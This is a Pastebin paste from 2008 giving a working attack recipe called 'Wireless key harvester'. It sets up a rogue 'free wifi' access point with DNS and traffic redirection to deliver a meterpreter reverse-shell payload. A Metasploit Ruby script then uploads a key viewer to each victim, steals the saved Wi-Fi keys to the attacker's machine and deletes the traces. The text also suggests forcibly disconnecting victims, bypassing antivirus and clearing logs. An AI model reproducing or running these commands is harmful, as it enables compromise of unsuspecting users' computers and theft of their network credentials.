Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Dec 13th, 2008  |  syntax: Bash  |  size: 2.88 KB  |  views: 406  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Wireless key harvester
  2.  
  3. First we create our meterpreter exe
  4. check this page out
  5. http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
  6.  
  7.  
  8. setup our listener
  9. ./msfconsole
  10. use exploit/multi/handler
  11. set PAYLOAD windows/meterpreter/reverse_tcp
  12. set LHOST 10.0.0.1
  13. set LPORT 55555
  14. set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb  
  15. set ExitOnSession false
  16. show options
  17. exploit -j
  18.  
  19.  
  20. next setup our fake access point
  21. modprobe tun
  22. airbase-ng -P -C 30 -e "free wifi" wlan1 -v
  23.  
  24.  
  25. no we setup our dhcp server
  26. ifconfig at0 up
  27. ifconfig lo up
  28. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  29. ifconfig at0 mtu 1400
  30. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  31. iptables --flush
  32. iptables --table nat --flush
  33. iptables --delete-chain
  34. iptables --table nat --delete-chain
  35. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  36. iptables -P FORWARD ACCEPT
  37. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  38. /etc/init.d/dhcp3-server restart
  39.  
  40.  
  41. setup apache server to host our exploit
  42. /etc/init.d/lighttpd stop
  43. lighttpd -D -f '/home/hm/Desktop/http/http'
  44.  
  45.  
  46. dns redirector -- in this case dnspoison
  47. cd dnspoison
  48. java ServerKernelMain 10.0.0.1 10.0.0.1
  49.  
  50.  
  51.  
  52. and thats it, wait for victims to connect, or forcefully disconnect them using mdk!!!!!!
  53.  
  54.  
  55. --------------------------- harvester.rb ---------------------------------------
  56.  
  57.  
  58.  
  59. #
  60. # Wireless key harvester using wireless key viewer"
  61.  
  62.  
  63.  
  64. require 'rex'
  65.  
  66. # Extract the host and port
  67. host,port = session.tunnel_peer.split(':')
  68.  
  69. print_status("New session found on #{host}:#{port}...")
  70.  
  71. # bin -- the name of our exe
  72. bin = "wkv.exe"
  73. # output of wireless key viewer
  74. out  = Rex::Text.rand_text_alpha_upper(5) + ".txt"
  75.  
  76. #destination for the keys in txt format
  77. dest = "/home/hm/Desktop/keys/"
  78.  
  79. #upload wireless key viewer --- modify it to bypass av's
  80.  
  81. print_status("Uploading Wireless Key Viewer")
  82. sleep(1)
  83. client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
  84. sleep(1)
  85. print_status("Uploaded Wireless Key Viewer")
  86. sleep(1)
  87.  
  88.  
  89.  
  90. #execute via cmd, output will be random name,
  91. print_status("Executing wireless key viewer ")
  92. client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
  93. print_status("bat file executed")
  94. sleep(1)
  95.  
  96. #download keys to our keys folder
  97. print_status("Downloading keys to keys folder ")
  98. client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
  99. print_status("Downloaded keys to keys folder ")
  100.  
  101.  
  102. #delete uploaded files -- we can also clear logs here if we want to
  103. sleep(1)
  104. print_status("Deleting uploaded files ")
  105. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
  106. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
  107. print_status("Have a nice day!!!!!! ")